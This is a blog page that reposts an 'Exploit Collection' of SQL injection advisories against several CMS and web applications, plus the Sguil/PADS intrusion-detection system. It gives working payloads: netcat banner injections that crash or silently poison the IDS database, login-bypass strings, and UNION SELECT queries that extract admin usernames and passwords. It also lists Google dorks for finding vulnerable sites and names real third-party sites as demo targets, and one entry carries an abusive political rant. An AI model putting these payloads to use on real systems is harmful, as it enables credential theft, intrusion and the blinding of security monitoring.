Sunday, 25 November 2012

0 Exploit Collection

Ataraxia/Sguil/PADS SQL Injection / Crash ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
Sguil/PADS SQL injection and server crash exploit
by Ataraxia (Benjamin Rose)
Public announcement made 7/15/09.
 
Please visit http://allmybase.com/ (my blog) for more up-to-date
information, and a quick patch.
 
This exploit has the ability to render any Intrusion Detection
System utilizing the sguil monitoring useless. At the lowest level,
you can kill the master logging daemon that collates the data into
a MySQL database. I've also been able to inject random and useless
data into the MySQL database, which opens the door for an obfuscation
of an attack, or a flat-out denial of service attack. There also exists
the possibility of dropping the database altogether, though I was not
able to make this happen during my preliminary testing of the attack.
 
The sguil sensor boxes report back to a sguil daemon on a management server,
which in turn puts the data received into a MySQL database. The sensor
collects data from many sensor agents, the most popular ones including snort
and sancp. Since snort is the de-facto standard NIDS, sguil is found in a lot
of places where there are mission-critical NIDS, making this a potent
vulnerability. The idea here is to craft a special packet containing a SQL
statement and send it across the wire, such that the sguil-agents will pick up
on it. We will exploit the Passive Asset Detection System (PADS) -> sguil
relationship, which will be monitoring for said banner packets. Thanks to the
availability of the netcat program, there is also no need for any programming
skill. Also, the attack can run on any port, so even an unprivileged user
could porentially run this attack.
 
Without further ado, here's the good stuff:
 
TO CRASH THE SERVER:
from a box that has its traffic monitored, run
echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777
...and then telnet to port 7777 from another box. There will be a syntax
error in the sguil management daemon's SQL insert statement, and it will
crash rather ungracefully. This is highly noticable, so be careful!
 
TO INJECT DATA SILENTLY:
from a box that has its traffic monitored, run
echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888
...and then telnet to port 8888 from another box. The difference here is the
semicolon in the statement. This will insert an asset into the SQL database as
ssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-)
 
PROOF OF CONCEPT:
mysql> use sguildb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> select * from pads where `hex_payload`=’deadbeefcafe’;
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload |
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe |
+————–+—–+———-+———————+————+———+——+———-+————-+————–+
1 row in set (0.01 sec)
 
 
Note that you don't even need to put in legit hex into the attack for it to work. Bonus points
if you put in a hexademical message to the sysadmin that doesn't even contain legit hex.

Sguil/PADS suffers from remote SQL injection and crash vulnerabilities.

Farbod Mahini/CommonSense CMS Blind SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
############################################################################
# Exploit Title: CommonSense CMS script Blind SQL Injection Vulnerability
# Google Dork: intext:"Powered by CommonSense CMS script"
# Date: 6/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org 
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
#
#
#  Exploit:
#
#
#  [~] Blind SQL :
#
http://[target]/special.php?id=1 [Blind SQL]
http://[target]/article.php?id=5 [Blind SQL]
http://[target]/cat2.php?id=1 [Blind SQL]
#
#  Test MySQL time based injection.
#
#  Demo:
#
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...
############################################################################
GreetZ : All H4ckCity Member - BHG Members - 1337day.com
############################################################################

CommonSense CMS suffers from a remote blind SQL injection vulnerability.

X-Cisadane/CMS Balitbang 3.x SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
=========================================================================
CMS Balitbang 3.x SQL Injection Vulnerability
=========================================================================
 
:-----------------------------------------------------------
--------------------------------------------------------------:
: # Exploit Title : CMS Balitbang 3.x SQL Injection Vulnerability
: # Date : 21 November 2011
: # Author : X-Cisadane
: # Version : 3.x
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:alumni.php?id=data&tahun&hal= OR inurl:index.php?
id=lih_buku&hal=
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane,
Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari
:-----------------------------------------------------------
--------------------------------------------------------------:
 
POC :
 
SQL Injection Vulnerability :
- Open Victim Website : http://<site>/<CMS Balitbang Installation
Path>/alumni.php?id=data&amp;tahun&amp;hal='[SQL]
- Open Victim Website : http://<site>/<CMS Balitbang Installation
Path>/index.php?id=lih_buku&amp;hal='[SQL]
- Open Victim Website : http://<site>/<CMS Balitbang Installation
Path>/index.php?id=artikel&amp;hal='[SQL]
- Open Victim Website : http://<site>/<CMS Balitbang Installation
Path>/index.php?id=album&amp;hal='[SQL]
- Open Victim Website : http://<site>/<CMS Balitbang Installation
Path>/index.php?id=berita&amp;hal='[SQL]
 
Example :
 
-= Regards =-
Dwi a.k.a X-Cisadane

CMS Balitbang version 3.x suffers from a remote SQL injection vulnerability.

Sora/Drumbeat CMS 1.0 SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Version: Version 1.0
# Tested on: Windows and Linux
-----------------------------------------
Drumbeat CMS SQL Injection Exploit
[+] Discovered and notified by Sora
A SQL injection exploit is found in Drumbeat CMS. The vulnerability exists in where there is an index.php page, such as index02.php?id=5. or index03.php?id=2.
 
Dork: "Powered by Drumbeat" inurl:index02.php
 
# Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--
 
You can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.
 
Greetz: Bw0mp and the rest of the people from Incursio ex Subter!
 
# EOF #

Drumbeat CMS version 1.0 suffers from a remote SQL injection vulnerability.

learn3r/Public Media Manager Bypass / SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#################################################
#  Public Media Manager SQLi vulns   #
#     By learn3r hacker from Nepal    #
#      damagicalhacker@gmail.com    #
#################################################
 
Product name: Public Media Manager
 
This product, an online NEWS CMS, suffers from SQL injection in login so that we can bypass the login system.
Also, it suffers from SQLi in the GET variables which can be exploited to get different information from the database.
 
################ SQL Login Bypass #################
 
Admin panel located at: /newsdb
 
Username: validuser'#  [eg. admin'#]
Password: learn3r   [or whatever]
 
Username: ' or 1='1'#
Password: learn3r   [ or whatever]
 
################ SQL Injections ##################
 
[+] Exploit:
 
http://localhost/pmm-cms/NewsCMS/newsdb/fullstory.php?storyid=-1+union+all+select+1,concat(@@version,0x3a,user(),0x3a,database())
 
Maybe there are more vulns but I can't give more time in auditing codes.
 
 
Greetz to: sToRm(Thanks a lot bro) and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar...
We need political stability and economic development in Nepal and you motherfuckers are terrorizing in the name of political parties. So BIG FUCK YOUs to all the political parties and leaders of Nepal.
 
By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

Public Media Manager suffers from bypass and remote SQL injection vulnerabilities.

Taurus Omar/InterPont Plus Kft SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
| C _:_ A |  InterPont Plus Kft - SQL Injection Vulnerability  | C _:_ A |
--------------------------------------------------------------------------
 
==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com
 
===> INFO:
Author        : TAURUS OMAR
Category      : Webapps / 0day
Title Exploit : InterPont Plus Kft- SQL Injection Vulnerability
Vendor        : InterPont Plus Kft
URL Vendor    : http://www.interpont.hu/
Google Dork   : intext:"Késztette: InterPont Plus Kft."
0day exploits : 1337day.com Inj3ct0r Exploit DataBase
 
==> SAMPLE'S SQLi:
http://www.piliscomp.com/~motorola/termekek.php?open=39&amp;katid=&amp;gyarto=4 [SQL Injection]
 
MORE IN GOOGLE..
 
# 1337day.com [2012-06-22]

InterPont Plus Kft suffers from a remote SQL injection vulnerability.

Fl0riX/Joomla KsAdvertiser SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
########################################################################
#        Joomla Component com_ksadvertiser SQL Injection Vulnerability                                     
########################################################################                                                     
# Author   :FL0RiX
#                                                       
# Name     : com_ksadvertiser
#                                                        
# Bug Type   : SQL Injection
#                                                       
# Infection    : Admin login bilgileri alinabilir.        
#                                                         
# Demo Vuln :
#
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/jos_users--
########################################################################
 
 
_________________________________________________________________
Yeni Windows 7: Gündelik iþlerinizi basitleþtirin. Size en uygun bilgisayarý bulun.

The Joomla KsAdvertiser component suffers from a remote SQL injection vulnerability.

Sora/Left 4 Dead Stats SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
----------------------------------
> Left 4 Dead Stats SQL Injection Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Google Dork: "In your dreams, script kiddies."
 
# VULNERABILITY DESCRIPTION:
Left 4 Dead Stats suffers from a remote SQL injection vulnerability in player.php.
 
# VULNERABILITY SOLUTION:
The owner of the website can sanitize the database inputs.
 
# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, Revelation, and Max Mafiotu.

Left 4 Dead Stats version 1.1 suffers from a remote SQL injection vulnerability.

SirGod/Limmy 1.01 SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
###########################################################################################
[+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
############################################################################################
 
[+] Script Homepage : http://www.limny-project.com/
 
[+] SQL Injection Vulnerability
 
 - Notes : magic_quotes_gpc = off
 
 - Vulnerable code in includes/functions.php
 
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
function CheckLogin($username, $password)
{
  global $db;
  $query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."users
WHERE user='$username' AND pass='$password'");
  if($check = $db->fetch_array($query))
  {
    return true;
  }else{
    return false;
  }
}
 
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
 - PoC
 
   Username : [REAL-ADMIN-NAME] ' or ' 1=1
   Password : anything
 
[REAL-ADMIN-NAME] = usually is admin
 
############################################################################################

Limmy version 1.01 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

3spi0n/PhpBridges Blog System SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Exploit Title: PhpBridges Blog System SQL Injection Vulnerability
# Date: 18/01/2012 - 04.19
# Author: 3spi0n
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:
 
[~] members.php
 
[$] Demo Sites:
 
[~] fantasticas.odisseias.net/members.php?id=2" [SQL Injection]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
# Dar bi Koridor Benimki, Kendimi Aradigim.
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
- Mr.PaPaRoSSe And 3spi0n -
 
Bug Researcher Group - TURKEY
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

PhpBridges Blog System suffers from a remote SQL injection vulnerability.

CoBRa_21/Webistry CMS 1.0 SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
################################################################################################
#  Exploit Title : Webistry v1.0 CMS SQL Injection Vulnerability
#
#  Author : CoBRa_21
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : Powered by CMS : Webistry v1.0
#
#  Script Page :  null
################################################################################################
#
#  Exploit
#
http://127.0.0.1/ [PATH] /index.php?pid=14' SQL
#
http://127.0.0.1/ [PATH] /index.php?pid=14 union select 0,1,2,3,version(),5,6,7
#
################################################################################################                                 

Webistry CMS version 1.0 suffers from a remote SQL injection vulnerability.

p0pc0rn/Lasernet CMS 1.5 SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
Title : LASERnet CMS  Vulnerable to SQL Injection
Dork : intext:"Powered by Lasernet"
Category: WebApps
 
 
Demo:
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+

Lasernet CMS version 1.5 suffers from a remote SQL injection vulnerability.

Palyo34/DS CMS 1.0 SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
 
 
 AUTHOR      :  Palyo34
 
 HOME        : http://www.1923turk.biz
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
 
Example:
 
-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--

DS CMS version 1.0 suffers from a remote SQL injection vulnerability.

longrifle0x/Facebook Fit-ify! SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
Title:
======
Facebook Fit-ify! - SQL Injection Vulnerability
 
 
Date:
=====
2011-12-18
 
 
References:
===========
 
 
VL-ID:
=====
337
 
 
Introduction:
=============
The application is currently included and viewable by all facebook users.
The service is an external 3rd party application sponsored by the Facebook Fit-ify! Development Team.
 
(Copy from the Vendors Homepage: http://facebook.com/pages/I-may-be-gone-some-time/)
 
Facebook is a social networking service and website launched in February 2004, operated and privately owned
by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create
a personal profile, add other users as friends, and exchange messages, including automatic notifications when
they update their profile. Facebook users must register before using the site. Additionally, users may join
common-interest user groups, organized by workplace, school or college, or other characteristics.
 
(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook)
 
 
Abstract:
=========
Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the 3rd party web
application - Fit-ify! (apps.facebook.com).
 
 
Report-Timeline:
================
2011-11-22:  Vendor Notification
2011-12-18:  Public or Non-Public Disclosure
 
 
Status:
========
Published
 
 
Exploitation-Technique:
=======================
Remote
 
 
Severity:
=========
High
 
 
Details:
========
A SQL Injection vulnerability is detected on the Fit-ify! facebook application (apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms.
 
Vulnerable Module(s):
                                  [+] Fit-ify! - Facebook 3rd Party Application
 
Vulnerable Param(s)/File(s):
                                  [+] 143596152351911?sk=app_8209307103
 
Affected Application:
                                  [+] facebook.com/pages/I-may-be-gone-some-time/
 
 
--- SQL Error Logs ---
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/fitify/fitify.com/lib.php on line 196
You haven\\\'t recorded any work-outs yet. Time to get outside and start exercising!
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/fitify/fitify.com/lib.php on line 538
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/fitify/fitify.com/lib.php on line 538
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/fitify/fitify.com/lib.php on line 538
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/fitify/fitify.com/lib.php on line 245
 
Picture(s):
            ../1.png
 
 
Proof of Concept:
=================
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...
 
URL:    facebook.com/pages
Path:    /I-may-be-gone-some-time/
Request:  143596152351911?sk=app_8209307103
 
Example:
http://[FACEBOOK]/[PAGE]/[FILE]?[PARAM]=[ID]&amp;[SQL Injection]
 
 
PoC:
 
 
Solution:
=========
Use the prepared statement class to fix the sql injection vulnerability &amp; filter sql error requests.
Set error(0) to prevent against information disclosure via exceptions or error reports.
 
 
Risk:
=====
The security risk of the application sql injection vulnerabilities are estimated as high(+).
 
 
Credits:
========
Vulnerability Laboratory Researcher      -   Ucha G. (longrifle0x)
 
 
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
 
                Copyright © 2011|Vulnerability-Lab
 
 
 
 
 
 
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com

The third party Facebook Fit-ify! application suffers from a remote SQL injection vulnerability.

3spi0n/Web Net Marketing Design SQL Injection ( na)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Exploit Title: web net marketing Design SQL Injection Vulnerability
# Date: 03/03/2012
# Author: 3spi0n
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:
 
[~] news-detail.php
 
[$] Demo ;
 
www.glamorgancricket.com/news-detail.php?int_id=775' [MySQLi]
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
# Dar bi Koridor Benimki, Kendimi Aradigim.
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
 
# Greetz : Grayhatz.Co
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
- Mr.PaPaRoSSe And 3spi0n -
 
Bug Researcher Group - TURKEY
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Web Net Marketing Design suffers from a remote SQL injection vulnerability. 
 
exploitsdownload.com

0 Comments

Bagaimana Pendapat Anda ?

Find Us on Facebook !